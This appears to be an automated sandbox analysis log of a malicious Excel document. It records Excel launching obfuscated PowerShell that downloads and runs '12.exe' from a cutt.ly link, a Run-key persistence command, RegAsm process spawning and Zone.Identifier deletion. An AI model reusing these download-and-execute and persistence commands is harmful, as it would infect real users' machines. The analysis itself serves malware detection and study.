Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\12.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\ntrwe.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\ntrwe.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\ntrwe.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\12.exe C:\Users\user\AppData\Local\Temp\12.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
Source: unknown Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
Source: unknown Process created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
Source: unknown Process created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
Source: unknown Process created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe') Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe') Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\12.exe C:\Users\user\AppData\Local\Temp\12.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\12.exe Process created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\12.exe Process created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe' Jump to behavior
Source: C:\Users\user\ntrwe.exe Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe Jump to behavior
Source: C:\Users\user\ntrwe.exe Process created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\12.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: RegAsm.pdb source: RegAsm.exe
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000006.00000002.2099102007.0000000002720000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2140184576.000000001B940000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2158358112.000000001B8A0000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe') Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe') Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe') Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe') Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe') Jump to behavior
Yara detected aPLib compressed binary
Source: Yara match File source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 12.exe PID: 2800, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2192, type: MEMORY
Source: Yara match File source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 11_2_012A5456 push ss; retf 11_2_012A5459
Source: C:\Users\user\AppData\Local\Temp\12.exe Code function: 11_2_0031AB04 pushad ; ret 11_2_0031AB2D
Source: C:\Users\user\ntrwe.exe Code function: 15_2_00E95456 push ss; retf 15_2_00E95459
Source: C:\Users\user\ntrwe.exe Code function: 15_2_005013F1 push edx; retf 15_2_00501403
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_0025523F push cs; iretd 17_2_00255240
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_00402AC0 push eax; ret 17_2_00402AD4
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_00402AC0 push eax; ret 17_2_00402AFC
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 19_2_0123523F push cs; iretd 19_2_01235240

Persistence and Installation Behavior:

barindex
Drops PE files to the document folder of the user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\12.exe Jump to dropped file
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\12.exe Jump to dropped file
Source: C:\Users\user\ntrwe.exe File created: C:\Users\user\AppData\Local\Temp\RegAsm.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\12.exe File created: C:\Users\user\ntrwe.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Users\user\AppData\Local\Temp\12.exe File created: C:\Users\user\ntrwe.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Users\user\AppData\Local\Temp\12.exe File created: C:\Users\user\ntrwe.exe Jump to dropped file
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jfdts Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jfdts Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Local\Temp\12.exe File opened: C:\Users\user\AppData\Local\Temp\12.exe\:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\ntrwe.exe File opened: C:\Users\user\ntrwe.exe\:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\ntrwe.exe File opened: C:\Users\user\ntrwe.exe\:Zone.Identifier read attributes | delete
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
